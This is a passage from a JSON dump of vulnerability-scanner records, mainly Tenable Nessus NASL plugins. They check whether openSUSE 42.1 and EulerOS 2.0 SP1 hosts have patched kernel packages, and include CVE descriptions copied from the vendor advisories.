value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=979913\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=980348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=980371\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=980657\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=981058\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=981267\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=981344\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=982238\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=982239\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=982712\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=983143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=983213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=984460\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected the Linux Kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux BPF doubleput UAF Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-docs-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-macros\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-qa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-obs-qa-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pv-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pv-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pv-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pv-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kernel-default-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kernel-default-base-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kernel-default-base-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kernel-default-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kernel-default-debugsource-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kernel-default-devel-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kernel-devel-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kernel-docs-html-4.1.26-21.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kernel-docs-pdf-4.1.26-21.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kernel-macros-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kernel-obs-build-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kernel-obs-build-debugsource-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kernel-obs-qa-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kernel-obs-qa-xen-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kernel-source-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kernel-source-vanilla-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kernel-syms-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-debug-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-debug-base-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-debug-base-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-debug-debugsource-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-debug-devel-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-debug-devel-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-ec2-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-ec2-base-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-ec2-base-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-ec2-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-ec2-debugsource-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-ec2-devel-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-pae-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-pae-base-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-pae-base-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-pae-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-pae-debugsource-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-pae-devel-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-pv-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-pv-base-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-pv-base-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-pv-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-pv-debugsource-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-pv-devel-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-vanilla-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-vanilla-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-vanilla-debugsource-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-vanilla-devel-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-xen-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-xen-base-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-xen-base-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-xen-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-xen-debugsource-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"i686\", reference:\"kernel-xen-devel-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-debug-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-debug-base-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-debug-base-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-debug-debugsource-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-debug-devel-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-debug-devel-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-ec2-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-ec2-base-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-ec2-base-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-ec2-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-ec2-debugsource-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-pae-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-pae-base-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-pae-base-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-pae-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-pae-debugsource-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-pae-devel-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-pv-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-pv-base-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-pv-base-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-pv-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-pv-debugsource-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-pv-devel-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-debugsource-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-xen-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-xen-base-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-4.1.26-21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-4.1.26-21.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-debug / kernel-debug-base / kernel-debug-base-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:51:43", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - It was found that the RFC 5961 challenge ACK rate\n limiting as implemented in the Linux kernel's\n networking subsystem allowed an off-path attacker to\n leak certain information about a given connection by\n creating congestion on the global challenge ACK rate\n limit counter and then measuring the changes by probing\n packets. An off-path attacker could use this flaw to\n either terminate TCP connection and/or inject payload\n into non-secured TCP connection between two endpoints\n on the network.(CVE-2016-5696)\n\n - A flaw was found in the Linux kernel's keyring handling\n code, where in key_reject_and_link() an uninitialised\n variable would eventually lead to arbitrary free\n address which could allow attacker to use a\n use-after-free style attack. (CVE-2016-4470)\n\n - A flaw was found in the way certain interfaces of the\n Linux kernel's Infiniband subsystem used write() as\n bi-directional ioctl() replacement, which could lead to\n insufficient memory security checks when being invoked\n using the splice() system call. A local unprivileged\n user on a system with either Infiniband hardware\n present or RDMA Userspace Connection Manager Access\n module explicitly loaded, could use this flaw to\n escalate their privileges on the system.(CVE-2016-4565)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-01T00:00:00", "title": "EulerOS 2.0 SP1 : kernel (EulerOS-SA-2016-1043)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5696", "CVE-2016-4470", "CVE-2016-4565"], "modified": "2017-05-01T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-debug", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2016-1043.NASL", "href": "https://www.tenable.com/plugins/nessus/99806", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99806);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-4470\",\n \"CVE-2016-4565\",\n \"CVE-2016-5696\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : kernel (EulerOS-SA-2016-1043)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - It was found that the RFC 5961 challenge ACK rate\n limiting as implemented in the Linux kernel's\n networking subsystem allowed an off-path attacker to\n leak certain information about a given connection by\n creating congestion on the global challenge ACK rate\n limit counter and then measuring the changes by probing\n packets. An off-path attacker could use this flaw to\n either terminate TCP connection and/or inject payload\n into non-secured TCP connection between two endpoints\n on the network.(CVE-2016-5696)\n\n - A flaw was found in the Linux kernel's keyring handling\n code, where in key_reject_and_link() an uninitialised\n variable would eventually lead to arbitrary free\n address which could allow attacker to use a\n use-after-free style attack. (CVE-2016-4470)\n\n - A flaw was found in the way certain interfaces of the\n Linux kernel's Infiniband subsystem used write() as\n bi-directional ioctl() replacement, which could lead to\n insufficient memory security checks when being invoked\n using the splice() system call. A local unprivileged\n user on a system with either Infiniband hardware\n present or RDMA Userspace Connection Manager Access\n module explicitly loaded, could use this flaw to\n escalate their privileges on the system.(CVE-2016-4565)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1043\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e95dfe3c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-229.40.1.88\",\n \"kernel-debug-3.10.0-229.40.1.88\",\n \"kernel-debuginfo-3.10.0-229.40.1.88\",\n 